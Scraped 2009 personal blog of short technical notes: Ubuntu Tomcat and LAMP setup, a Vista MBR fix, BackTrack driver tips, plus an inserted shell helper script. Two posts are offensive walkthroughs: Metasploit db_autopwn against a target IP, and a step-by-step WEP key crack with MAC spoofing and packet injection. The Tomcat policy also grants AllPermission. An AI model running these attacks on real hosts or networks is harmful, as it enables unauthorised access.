http://www.ethicalhacker.net/content/view/249/1/
Friday, June 12, 2009
Metasploit db_autopwn
./msfconsole
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i
Monday, June 8, 2009
Restore VISTA MBR (if the traditional methods are failing)
- Download and install EasyBCD
- Click on the Manage Bootloader button
- Make sure "Reinstall the Vista Bootloader" is selected
- Hit the "Write MBR" button
- Re-start your machine
Your Vista Bootloader should be restored.
Saturday, June 6, 2009
Synaptic not showing all packages
On a fresh VMware install of Ubuntu 8.10 I ran into the problem where additional packages weren't showing up in the Synaptic Package Manager. I've seen this before and have previously been able to resolve it. Once and for all I'm going to blog the fix so I can find it for future reference.
- Open up a terminal
- Enter the command: sudo update-apt-xapian-index
- Restart Synaptic Package Manager when the update is complete
- You may need to reload the package information by pressing Ctrl-R
- It should work fine now
Setup a Tomcat server in Ubuntu
Install the required packages (either using "apt-get install" in the terminal or from the package manager), then follow the instructions to configure it:
- tomcat5.5
- tomcat5.5-admin
- tomcat5.5-webapps
- sun-java6-jdk
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:
#JAVA_HOME
to read:
JAVA_HOME=/usr/lib/jvm/java-6-sun
** This assumes that you have Java 6 installed; check that the folder exists.
Update the Tomcat security policy:
sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy
At the very end of the file, add the lines:
grant {
permission java.security.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};
** The class is java.security.AllPermission (there is no java.net.AllPermission). AllPermission is the broadest grant there is: it already covers the SocketPermission line and disables the security manager sandbox for every code base this file applies to, so the SocketPermission line on its own is the least-privilege version if that is all your webapp needs.
Next you need to add the MySQL Connector/J .jar to your Tomcat. Go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file (when it asks whether you have registered, look below for the 'No Thanks' link). Double-click the downloaded tar file to extract it, go into the newly created folder and run:
sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/
This copies the JDBC driver jar into Tomcat's server library so that your JSPs can use it.
Restart your Tomcat server:
sudo /etc/init.d/tomcat5.5 restart
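The two file edits in this procedure (setting JAVA_HOME in /etc/default/tomcat5.5 and appending the grant block to 03catalina.policy) as an added shell example; this is not code from the original post. The function names are mine, the file paths are parameters so each step can be tried on a copy before it is run with sudo against /etc, and both functions are idempotent, so re-running the procedure does not stack duplicate grant blocks. The JDK path default is the page's /usr/lib/jvm/java-6-sun, and the permission class is written as java.security.AllPermission because java.net.AllPermission does not exist.

```shell
#!/bin/sh
# Added example, not code from the original post: idempotent helpers for the two
# file edits in the Tomcat 5.5 procedure. Paths are parameters so each function
# can be tried on a copy of the file before it is run (with sudo) against /etc.

# Set JAVA_HOME in an /etc/default/tomcat5.5-style file: uncomment and replace
# the "#JAVA_HOME..." line if one exists, otherwise append the assignment.
set_java_home() {
    file="$1"
    jdk="${2:-/usr/lib/jvm/java-6-sun}"   # the page's Sun Java 6 location
    if [ ! -d "$jdk" ]; then
        echo "warning: $jdk does not exist; is sun-java6-jdk installed?" >&2
    fi
    if grep -qE '^#?JAVA_HOME' "$file"; then
        new="$file.tmp.$$"
        sed -E "s|^#?JAVA_HOME.*|JAVA_HOME=$jdk|" "$file" > "$new" &&
            cat "$new" > "$file" && rm -f "$new"   # keeps owner/mode of $file
    else
        echo "JAVA_HOME=$jdk" >> "$file"
    fi
    grep -qxF "JAVA_HOME=$jdk" "$file"   # verify: exactly this line is present
}

# Append the page's grant block to a catalina policy file, but only once, so
# re-running the procedure does not stack duplicate grant blocks.
# java.security.AllPermission (the real class; java.net.AllPermission does not
# exist) already subsumes the SocketPermission line and disables the security
# manager sandbox for every code base the file covers.
add_policy_grant() {
    file="$1"
    if grep -qF 'permission java.net.SocketPermission "localhost:3306", "connect";' "$file"; then
        return 0   # grant already present
    fi
    cat >> "$file" <<'EOF'
grant {
    permission java.security.AllPermission;
    permission java.net.SocketPermission "localhost:3306", "connect";
};
EOF
}
```

Try it on copies first, e.g. `cp /etc/default/tomcat5.5 /tmp/ && set_java_home /tmp/tomcat5.5`, then repeat with sudo against the real paths.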
Setup LAMP in Ubuntu
1. Install Apache2
- Start the package manager by going to the menu: "System>Administration>Synaptic Package Manager"
- Enter your password to allow the program to run.
- Search for the package named "apache2" by clicking the search button on the menu bar.
- Find the package named exactly "apache2"
- Click the check box next to the package and choose "Mark for installation" from the pop up menu.
- A window will appear asking if additional changes should be made. These are other packages that apache2 requires to function properly. Choose the button that says "Mark".
- Apply the changes by clicking the "Apply" button from the menu
- Note: You can select as many packages as you want before applying changes. For example you could install Apache2 at the same time as you install MySQL.
Search for and install these packages from the package manager:
- php5-mysql
- mysql-server
- mysql-client
- phpmyadmin (installer will ask what server to connect to. Choose apache2.)
- libapache2-mod-auth-mysql
To make phpMyAdmin available under Apache you only need to include one line in /etc/apache2/apache2.conf. First open the file:
sudo gedit /etc/apache2/apache2.conf
Add the following line to apache2.conf:
Include /etc/phpmyadmin/apache.conf
Now restart Apache:
sudo /etc/init.d/apache2 restart
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!", your Apache server is running and configured. Now point it to "http://127.0.1.1/phpmyadmin" and verify that the phpMyAdmin page comes up.
Tuesday, June 2, 2009
Cracking WEP
I've looked at several different methods for cracking WEP... this is what worked for me:
Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
kismet
Open a new terminal session. Plug the values you collected from Kismet into the command below (you may want to create and browse to a temporary directory, because this will create several files that will be dumped into the present working directory):
Code:
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs
Next you'll want to create another terminal session and begin authentication with the router:
Code:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
aircrack-ng -s /wep_router.ivs
This should do it... I'll tweak this as I go to make it better. Feel free to give feedback if you have suggestions or changes.
Monday, June 1, 2009
BT4 and rausb0 (the driver I used in BT3)
After much trial, I finally figured out how to configure my USB wireless adapter that utilized the rausb0 driver in BackTrack 3. Since moving over to BackTrack 4 I haven't been able to use my external USB adapter.
Below is the command I was using with the resulting error:
root@bt:~# ifconfig rausb0 up
rausb0: ERROR while getting interface flags: No such device
I finally figured out that they have updated the driver for my Hawking device to use the wlan0 driver instead. I'm not sure how this works for other devices but it fixed my problem. New command:
root@bt:~# ifconfig wlan0 up
root@bt:~#
Success!